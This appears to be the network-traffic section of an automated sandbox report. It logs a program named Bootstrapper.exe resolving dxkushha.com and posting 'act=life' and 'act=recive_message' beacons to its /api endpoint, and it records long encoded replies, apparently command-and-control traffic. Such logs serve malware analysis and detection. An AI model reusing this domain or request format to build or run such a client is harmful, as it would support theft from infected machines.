                                                                              Dec 27, 2024 03:36:19.164522886 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:19.181529045 CET49775443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:19.181544065 CET44349775104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:19.490066051 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:19.490087986 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:19.490151882 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:19.490386009 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:19.490397930 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:20.791572094 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:20.791685104 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:20.792674065 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:20.792684078 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:20.792882919 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:20.793917894 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:20.794111013 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:20.794142962 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:20.794207096 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:20.794214964 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:21.765541077 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:21.765647888 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:21.765716076 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:21.767008066 CET49782443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:21.767015934 CET44349782104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:22.588867903 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:22.588895082 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:22.588977098 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:22.589574099 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:22.589586973 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:23.820698977 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:23.820776939 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:23.822348118 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:23.822355032 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:23.822551012 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:23.823663950 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:23.823782921 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:23.823786974 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:24.645350933 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:24.645418882 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:24.645467043 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:24.645558119 CET49788443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:24.645570040 CET44349788104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:24.813879967 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:24.813946009 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:24.814002991 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:24.814529896 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:24.814548016 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:26.074498892 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:26.074729919 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:26.075849056 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:26.075872898 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:26.076087952 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:26.077210903 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:26.077281952 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:26.077294111 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:27.432431936 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:27.432523966 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:27.432589054 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:27.432765961 CET49794443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:27.432805061 CET44349794104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:27.436784983 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:27.436822891 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:27.436912060 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:27.437256098 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:27.437271118 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:28.695382118 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:28.695447922 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:28.696613073 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:28.696623087 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:28.696841955 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:28.738255978 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:28.751827002 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:28.751838923 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:28.751887083 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:29.471983910 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:29.472055912 CET44349801104.21.80.1192.168.2.4
                                                                              Dec 27, 2024 03:36:29.472292900 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:29.472292900 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:29.472352028 CET49801443192.168.2.4104.21.80.1
                                                                              Dec 27, 2024 03:36:29.472364902 CET44349801104.21.80.1192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 03:36:08.988554001 CET6246553192.168.2.41.1.1.1
                                                                              Dec 27, 2024 03:36:09.268695116 CET53624651.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 03:36:08.988554001 CET192.168.2.41.1.1.10x1368Standard query (0)dxkushha.comA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.80.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.48.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.96.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.32.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.112.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.64.1A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 03:36:09.268695116 CET1.1.1.1192.168.2.40x1368No error (0)dxkushha.com104.21.16.1A (IP address)IN (0x0001)false
                                                                              • dxkushha.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449753104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:10 UTC259OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-12-27 02:36:11 UTC1119INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=64a45e09t7vflc5ag5e19ptft3; expires=Mon, 21 Apr 2025 20:22:50 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXksVLYyiGmpXiE6imAaOFBa2ELqD4%2F87sVZLaz4tVzQDNQXf4bKMGUw24TrJvzfVET2LRIX%2BZu8MWiiqOY5rqr%2F7cZp69VOUKkB8hkuAzwAeLUX6Mgtug0WDbECRME%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ebe85b5a43ee-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1762&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=903&delivery_rate=1564844&cwnd=230&unsent_bytes=0&cid=4736baba1e66607e&ts=794&x=0"
                                                                              2024-12-27 02:36:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-12-27 02:36:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449759104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 02:36:12 UTC260OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 86
                                                                              Host: dxkushha.com
                                                                              2024-12-27 02:36:12 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                              2024-12-27 02:36:13 UTC1111INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 02:36:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=klbvph5tojd6k58sijbveilbrr; expires=Mon, 21 Apr 2025 20:22:52 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlt7cOirSzagYGYKZX5LviUfaauamYOPc2yaP3UwvviJnmzoSHaGkTlV08Pj4IHnPBz0uxsaLqUXgg2bFZO8yQq0L0Em8qnhQihCJynfeHAlnvGta8qN640pmLAxgMc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f85ebf5fbd742d2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4200&recv_bytes=982&delivery_rate=39736&cwnd=227&unsent_bytes=0&cid=61783f4edf5c016c&ts=884&x=0"
                                                                              2024-12-27 02:36:13 UTC258INData Raw: 34 36 63 0d 0a 67 5a 68 50 4a 62 57 2b 39 6c 6a 50 62 58 62 79 32 41 72 47 68 41 34 61 64 58 65 6f 64 39 73 52 6b 50 61 51 45 79 53 4f 30 58 6e 36 75 6a 6b 48 6a 34 72 61 65 72 77 49 56 4d 69 2b 61 36 72 33 61 7a 5a 58 46 73 78 56 34 58 66 78 6d 75 4e 32 43 4b 79 6e 46 4b 4f 69 4b 55 54 5a 7a 5a 4e 30 37 51 67 4f 30 4f 4a 52 76 61 5a 72 64 46 64 4e 69 68 4b 78 63 2f 47 61 38 6e 4a 50 34 61 45 56 34 76 41 6a 51 74 33 62 6c 54 79 75 41 52 75 58 76 57 2b 6e 37 6d 42 7a 47 42 2f 46 56 66 63 7a 39 59 79 79 4b 51 62 44 74 41 33 67 31 53 35 57 33 70 79 4c 64 4c 52 50 45 35 7a 36 4d 4f 54 6c 61 33 67 5a 45 63 77 63 73 33 6e 34 6b 76 4e 33 54 76 36 34 48 2b 6e 77 4c 55 48 63 30 5a 77 6f 6f 77 73 63 6e 4c 74 6c 70 36 59 69 4f 42 41 4e 69 6b 33 35 49 4d 43 58 34 32
                                                                              Data Ascii: 46cgZhPJbW+9ljPbXby2ArGhA4adXeod9sRkPaQEySO0Xn6ujkHj4raerwIVMi+a6r3azZXFsxV4XfxmuN2CKynFKOiKUTZzZN07QgO0OJRvaZrdFdNihKxc/Ga8nJP4aEV4vAjQt3blTyuARuXvW+n7mBzGB/FVfcz9YyyKQbDtA3g1S5W3pyLdLRPE5z6MOTla3gZEcwcs3n4kvN3Tv64H+nwLUHc0ZwoowscnLtlp6YiOBANik35IMCX42
                                                                              2024-12-27 02:36:13 UTC881INData Raw: 61 4d 64 6f 2b 56 6a 58 70 66 62 6d 48 72 31 54 78 79 63 74 47 32 6e 36 57 74 35 46 77 66 46 46 62 70 37 2b 70 44 34 66 6b 6e 6a 76 52 48 6b 38 69 52 41 32 4e 75 63 50 4b 49 4d 56 4e 37 36 62 37 79 6d 4e 44 67 33 42 63 6b 57 72 58 37 6a 31 4f 30 2f 58 36 79 30 46 36 4f 69 62 55 48 5a 33 5a 6b 36 76 77 63 66 6d 37 39 36 72 2b 39 68 64 52 63 59 77 42 71 36 63 2f 57 65 2b 48 35 4d 36 4c 34 57 35 66 6f 74 42 35 6d 63 6b 79 4c 74 56 31 53 7a 76 33 69 6a 36 6e 6f 36 4c 56 58 56 57 36 41 7a 39 5a 69 79 4b 51 62 6b 74 68 6a 67 38 53 4a 45 33 39 65 47 4f 72 38 4a 47 5a 57 6f 62 71 48 6f 5a 6e 73 46 48 38 51 54 75 6e 72 35 6e 66 64 32 51 71 7a 39 57 2b 54 69 62 52 2b 58 2f 5a 6b 78 6f 51 55 44 6b 50 70 33 36 76 38 73 66 78 74 56 6b 6c 57 39 63 76 61 56 39 6e 39 49
                                                                              Data Ascii: aMdo+VjXpfbmHr1TxyctG2n6Wt5FwfFFbp7+pD4fknjvRHk8iRA2NucPKIMVN76b7ymNDg3BckWrX7j1O0/X6y0F6OibUHZ3Zk6vwcfm796r+9hdRcYwBq6c/We+H5M6L4W5fotB5mckyLtV1Szv3ij6no6LVXVW6Az9ZiyKQbkthjg8SJE39eGOr8JGZWobqHoZnsFH8QTunr5nfd2Qqz9W+TibR+X/ZkxoQUDkPp36v8sfxtVklW9cvaV9n9I
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 33 65 61 30 0d 0a 64 68 6b 53 33 46 57 6d 50 65 76 55 39 58 30 47 74 50 4d 56 37 76 45 68 51 4e 37 64 6c 7a 71 6e 41 52 75 61 73 6d 43 6b 36 32 31 7a 48 78 50 48 48 72 5a 38 39 5a 7a 78 66 55 50 68 73 46 75 74 75 69 70 66 6c 34 54 55 48 36 4d 4d 42 59 48 34 58 61 66 6f 59 6e 38 42 56 64 56 62 6f 44 50 31 6d 4c 49 70 42 75 61 30 48 4f 66 33 4a 30 54 54 32 4a 6b 31 70 41 59 64 67 72 42 6b 71 76 52 68 63 68 49 62 78 68 43 32 63 2f 4f 56 2f 48 74 4e 72 50 31 62 35 4f 4a 74 48 35 66 7a 6d 53 71 2f 42 52 2b 42 2b 46 32 6e 36 47 4a 2f 41 56 58 56 57 36 41 7a 39 5a 69 79 4b 51 62 6e 74 52 66 76 2b 69 74 56 32 64 4f 47 4d 4c 38 4c 47 70 53 32 5a 71 33 72 59 33 30 46 45 63 6f 48 75 48 62 31 6d 76 39 6a 51 36 7a 39 57 2b 54 69 62 52 2b 58 35 71 41 39 76 52 34 54 30
                                                                              Data Ascii: 3ea0dhkS3FWmPevU9X0GtPMV7vEhQN7dlzqnARuasmCk621zHxPHHrZ89ZzxfUPhsFutuipfl4TUH6MMBYH4XafoYn8BVdVboDP1mLIpBua0HOf3J0TT2Jk1pAYdgrBkqvRhchIbxhC2c/OV/HtNrP1b5OJtH5fzmSq/BR+B+F2n6GJ/AVXVW6Az9ZiyKQbntRfv+itV2dOGML8LGpS2Zq3rY30FEcoHuHb1mv9jQ6z9W+TibR+X5qA9vR4T0
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 6c 66 58 39 58 57 34 6f 62 76 33 4f 79 7a 4f 52 68 55 65 75 73 56 66 71 36 4b 6b 75 58 68 4e 51 77 76 77 6f 61 6c 4c 42 74 6f 4f 70 6d 65 42 49 48 77 68 4f 2b 66 2f 71 52 2f 58 64 44 34 62 51 51 34 4f 67 2f 52 4e 50 53 6d 48 72 6a 54 78 4f 49 2b 6a 44 6b 77 33 74 37 42 78 50 4a 56 61 59 39 36 39 54 31 66 51 61 30 38 78 76 74 39 69 5a 41 33 4e 65 51 50 71 30 43 48 35 36 30 59 61 6a 75 59 48 38 46 47 4d 38 64 73 33 72 33 6d 50 39 79 56 4f 2b 79 57 36 32 36 4b 6c 2b 58 68 4e 51 64 6e 6a 67 33 30 4b 55 6d 76 61 5a 72 64 46 64 4e 69 68 53 78 64 50 79 51 34 48 39 55 34 72 51 62 35 66 49 6c 51 4e 76 53 6d 69 69 6c 44 68 53 65 74 57 43 74 34 6d 31 38 45 78 6e 4e 56 66 63 7a 39 59 79 79 4b 51 62 45 73 41 48 35 75 41 4e 4d 31 39 75 45 4c 4c 5a 50 43 39 36 6a 4b 4b
                                                                              Data Ascii: lfX9XW4obv3OyzORhUeusVfq6KkuXhNQwvwoalLBtoOpmeBIHwhO+f/qR/XdD4bQQ4Og/RNPSmHrjTxOI+jDkw3t7BxPJVaY969T1fQa08xvt9iZA3NeQPq0CH560YajuYH8FGM8ds3r3mP9yVO+yW626Kl+XhNQdnjg30KUmvaZrdFdNihSxdPyQ4H9U4rQb5fIlQNvSmiilDhSetWCt4m18ExnNVfcz9YyyKQbEsAH5uANM19uELLZPC96jKK
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 57 51 79 4b 45 72 55 7a 71 74 54 2f 59 30 66 70 6f 52 2f 73 38 54 39 4d 30 64 79 52 4b 4b 6f 44 48 70 2b 35 59 4b 6e 6c 5a 47 6f 58 47 4d 6f 48 71 33 58 35 6d 72 49 2f 42 75 75 72 57 37 75 36 48 46 44 63 6e 49 74 30 74 45 38 54 6e 50 6f 77 35 4f 56 6d 64 52 6b 48 7a 68 4f 79 63 50 79 63 39 33 6c 43 35 72 34 55 36 50 41 6b 54 39 66 54 6b 54 4b 6d 43 52 71 52 76 47 53 70 70 69 49 34 45 41 32 4b 54 66 6c 55 36 4a 6e 30 5a 6c 66 5a 74 42 75 79 75 6a 49 4a 7a 70 79 54 4e 75 31 58 56 4a 32 32 59 71 6e 6a 61 48 41 51 46 73 73 5a 76 58 37 2f 6b 50 74 31 51 2f 36 68 48 65 33 36 49 6b 6e 59 30 49 59 30 71 41 38 59 30 50 51 6f 6f 2f 34 73 49 46 63 6b 33 52 58 35 62 4c 79 4e 73 6e 5a 4b 72 4f 74 62 37 50 63 2f 53 39 6a 63 6c 54 6d 70 42 42 4f 57 76 47 6d 6e 34 32 39
                                                                              Data Ascii: WQyKErUzqtT/Y0fpoR/s8T9M0dyRKKoDHp+5YKnlZGoXGMoHq3X5mrI/BuurW7u6HFDcnIt0tE8TnPow5OVmdRkHzhOycPyc93lC5r4U6PAkT9fTkTKmCRqRvGSppiI4EA2KTflU6Jn0ZlfZtBuyujIJzpyTNu1XVJ22YqnjaHAQFssZvX7/kPt1Q/6hHe36IknY0IY0qA8Y0PQoo/4sIFck3RX5bLyNsnZKrOtb7Pc/S9jclTmpBBOWvGmn429
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 6b 33 35 65 50 71 62 34 48 52 50 35 4c 63 53 34 2f 34 6e 53 74 44 63 6b 54 65 6f 43 78 71 55 76 57 69 6f 36 57 74 77 47 42 48 4b 47 76 6b 39 73 70 50 71 4d 52 36 73 6b 78 44 31 32 79 4e 4d 78 5a 79 4c 64 4c 52 50 45 35 7a 36 4d 4f 54 6f 5a 58 6b 66 47 38 59 64 76 57 48 79 6e 2f 74 2b 52 2b 4f 7a 47 4f 4c 77 4a 56 58 52 33 4a 38 79 71 67 63 51 6e 71 68 70 71 36 59 69 4f 42 41 4e 69 6b 33 35 51 75 53 54 39 58 34 45 78 62 51 41 34 76 41 75 54 4e 75 63 69 33 53 30 54 78 4f 63 2b 6a 44 6b 36 32 42 31 45 77 66 47 46 62 6c 36 39 5a 37 67 66 6b 6e 68 73 42 76 6d 36 43 78 56 32 4e 65 52 4f 61 6b 41 47 35 79 79 59 75 53 6f 4c 48 38 50 56 5a 4a 56 6c 58 44 6a 6e 72 42 57 58 50 71 30 46 2f 4c 78 49 45 75 58 77 39 6f 6a 37 51 67 59 30 4f 49 6f 70 4f 64 68 61 68 49 55
                                                                              Data Ascii: k35ePqb4HRP5LcS4/4nStDckTeoCxqUvWio6WtwGBHKGvk9spPqMR6skxD12yNMxZyLdLRPE5z6MOToZXkfG8YdvWHyn/t+R+OzGOLwJVXR3J8yqgcQnqhpq6YiOBANik35QuST9X4ExbQA4vAuTNuci3S0TxOc+jDk62B1EwfGFbl69Z7gfknhsBvm6CxV2NeROakAG5yyYuSoLH8PVZJVlXDjnrBWXPq0F/LxIEuXw9oj7QgY0OIopOdhahIU
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 50 6a 6b 2b 4d 78 48 76 71 6a 44 4f 54 6c 59 31 36 58 32 35 68 36 39 55 38 66 6e 37 52 6c 72 2b 4a 6c 66 52 38 57 7a 78 43 7a 66 2f 36 56 2b 6e 68 4d 36 62 59 64 36 66 6b 6a 53 4e 62 51 6b 44 4f 6a 42 6c 54 65 2b 6d 2b 38 70 6a 51 34 49 51 58 4e 44 62 52 6a 73 4b 62 78 59 46 66 35 76 67 76 6c 75 41 4a 45 32 39 2b 52 50 62 31 50 43 39 36 6a 4b 4b 50 71 4c 43 42 58 46 63 34 5a 75 6e 54 38 6d 2f 39 2b 51 65 65 38 45 65 33 6f 49 6b 4c 66 30 4a 77 33 76 77 55 65 67 72 4e 68 71 65 68 6b 61 68 52 56 68 46 57 2b 61 37 4c 4d 73 6b 4e 4d 37 37 38 4e 37 76 56 74 57 4a 6e 46 31 44 32 68 54 30 7a 51 71 48 71 6b 37 57 78 2f 47 51 66 4c 48 62 5a 35 38 70 4c 35 65 30 58 6c 74 78 58 71 2f 43 78 4b 31 74 32 55 50 36 30 47 42 70 33 36 4a 75 54 68 64 44 68 50 56 66 30 5a 73
                                                                              Data Ascii: Pjk+MxHvqjDOTlY16X25h69U8fn7Rlr+JlfR8WzxCzf/6V+nhM6bYd6fkjSNbQkDOjBlTe+m+8pjQ4IQXNDbRjsKbxYFf5vgvluAJE29+RPb1PC96jKKPqLCBXFc4ZunT8m/9+Qee8Ee3oIkLf0Jw3vwUegrNhqehkahRVhFW+a7LMskNM778N7vVtWJnF1D2hT0zQqHqk7Wx/GQfLHbZ58pL5e0XltxXq/CxK1t2UP60GBp36JuThdDhPVf0Zs
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 69 50 77 62 6f 6f 6c 75 37 71 6e 38 63 67 6f 2f 44 61 76 38 51 57 6f 6e 36 66 75 53 2b 50 6a 5a 58 42 34 70 4e 2b 54 54 78 68 75 42 33 52 66 71 77 58 4e 33 45 44 55 7a 62 33 35 67 37 71 6b 39 61 30 4c 55 6f 2f 4e 38 73 65 77 55 48 68 51 53 76 66 75 4b 54 76 6e 6c 58 34 62 39 62 72 62 70 68 51 39 7a 51 6b 54 32 39 51 41 61 41 73 57 53 79 71 6d 68 71 56 31 75 4b 42 4c 4a 38 34 4a 72 31 50 6c 66 36 76 67 76 67 2f 79 6f 4c 33 38 32 5a 4e 75 31 42 56 49 57 78 5a 4b 4c 72 65 54 63 47 41 38 6b 44 76 6a 2f 36 68 66 39 39 42 74 50 39 57 2f 75 36 64 51 66 69 33 35 6f 30 71 68 6b 46 33 5a 70 6a 71 4f 56 67 65 52 42 56 68 46 57 2f 4d 36 72 48 76 44 46 43 2f 66 4e 44 73 36 68 32 45 6f 53 4c 78 47 69 79 51 51 33 51 72 43 6a 38 74 43 49 34 42 56 57 53 56 66 35 77 34 49
                                                                              Data Ascii: iPwboolu7qn8cgo/Dav8QWon6fuS+PjZXB4pN+TTxhuB3RfqwXN3EDUzb35g7qk9a0LUo/N8sewUHhQSvfuKTvnlX4b9brbphQ9zQkT29QAaAsWSyqmhqV1uKBLJ84Jr1Plf6vgvg/yoL382ZNu1BVIWxZKLreTcGA8kDvj/6hf99BtP9W/u6dQfi35o0qhkF3ZpjqOVgeRBVhFW/M6rHvDFC/fNDs6h2EoSLxGiyQQ3QrCj8tCI4BVWSVf5w4I
                                                                              2024-12-27 02:36:13 UTC1369INData Raw: 37 36 45 4a 35 66 6b 37 52 4a 44 69 71 68 2b 67 41 68 47 65 76 56 61 61 78 32 5a 6f 47 68 72 4e 4b 34 64 45 34 35 50 69 4d 32 44 76 70 52 69 6a 74 47 31 66 6c 34 54 55 47 36 63 66 47 5a 2b 39 4b 4f 71 6d 61 44 68 50 56 65 38 59 74 48 62 38 6b 37 42 51 54 50 79 2b 46 4f 53 36 59 77 66 62 6e 4d 78 36 72 41 55 45 6e 62 56 76 36 4f 46 32 66 31 64 62 69 68 76 35 4b 37 4b 56 2b 47 46 4c 34 37 52 58 35 66 51 6a 42 38 69 53 6a 58 71 37 54 30 7a 44 39 43 69 32 70 6a 51 34 55 42 76 48 46 4c 70 39 38 59 62 67 64 30 58 36 73 46 7a 64 78 41 68 4b 32 74 6d 61 50 5a 4d 78 4e 5a 71 71 5a 61 76 68 4c 6c 67 51 41 38 6b 72 68 30 54 6a 6b 2b 49 7a 59 4f 2b 6c 47 4b 4f 30 62 56 2b 58 68 4e 51 62 70 78 38 5a 6e 37 30 71 68 4f 46 36 65 31 64 62 69 68 48 35 4b 37 4b 78 2f 33 78
                                                                              Data Ascii: 76EJ5fk7RJDiqh+gAhGevVaax2ZoGhrNK4dE45PiM2DvpRijtG1fl4TUG6cfGZ+9KOqmaDhPVe8YtHb8k7BQTPy+FOS6YwfbnMx6rAUEnbVv6OF2f1dbihv5K7KV+GFL47RX5fQjB8iSjXq7T0zD9Ci2pjQ4UBvHFLp98Ybgd0X6sFzdxAhK2tmaPZMxNZqqZavhLlgQA8krh0Tjk+IzYO+lGKO0bV+XhNQbpx8Zn70qhOF6e1dbihH5K7Kx/3x


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449766104.21.80.14435416C:\Users\user\Desktop\Bootstrapper.exe
                                                                              TimestampBytes transferredDirectionData
